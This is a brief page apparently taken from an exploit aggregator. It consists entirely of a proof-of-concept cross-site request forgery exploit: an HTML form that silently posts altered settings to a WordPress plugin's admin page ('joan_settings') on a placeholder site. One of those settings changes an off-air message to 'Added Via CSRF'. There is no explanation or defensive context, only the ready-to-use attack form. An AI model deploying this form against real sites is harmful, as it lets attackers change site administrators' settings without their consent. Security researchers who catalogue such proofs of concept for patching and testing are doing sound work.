Share
## https://sploitus.com/exploit?id=WPEX-ID:27428224-A1DA-432F-AC84-84B7DEB295DB
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=joan_settings" method="POST">
<input type="hidden" name="joan_options[imagesOn]" value="yes" />
<input type="hidden" name="joan_options[showUpcoming]" value="yes" />
<input type="hidden" name="joan_options[offAirMessage]" value="Added Via CSRF" />
<input type="hidden" name="shut-it-down" value="no" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>